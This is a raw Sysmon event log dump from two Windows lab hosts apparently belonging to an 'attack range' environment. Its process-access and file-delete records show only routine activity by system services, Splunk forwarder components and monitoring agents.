12:18:30.433{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015511Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.433{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015510Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.433{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015509Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.433{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E396-63C7-E901-00000000B002}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015508Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.433{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E396-63C7-E901-00000000B002}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015507Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.434{E5A8D418-E396-63C7-E901-00000000B002}2268C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000015506Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:30.261{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=18A493B06C7509786ABA78A18D21C08D,SHA256=353B32C752ABE6A67B766214C5612C27BCB4652A4662D9A35D8D5F1CEAE7F51E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000015542Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:31.742{E5A8D418-E397-63C7-EA01-00000000B002}6082488C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000015541Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:31.601{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9F293A13F8B0AC6E71698B9DEF8C708,SHA256=FA60E156083562806E1C5C670C9E5F4FE2E49EDB1E393FE7DC6924E452FDCB82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000040714Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.950{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3BC1B558EBB2DEA21F37345BB7D0B97,SHA256=22B5C151EAACA213890FE2B15D25E991DF7ED5B1CCECD7741953DB80B886584A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040713Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.869{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040712Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.868{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040711Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.863{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040710Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.861{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040709Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.857{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000040708Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.857{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB69A253ADD84528BB5568014695A7EF,SHA256=8D5751D13111621342C2A816A49D7AE4F44D53BD6D0AF2CC664BB5E9D68F53A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040707Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.846{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040706Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.841{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040705Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.836{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040704Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.833{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040703Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.832{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040702Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.830{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040701Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.806{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040700Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.800{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040699Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040698Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.784{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040697Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.777{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040696Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.773{FE4C2B44-E397-63C7-0E06-00000000AF02}48604320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015540Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:31.585{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E397-63C7-EA01-00000000B002}608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015539Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:31.585{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015538Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:31.585{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015537Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 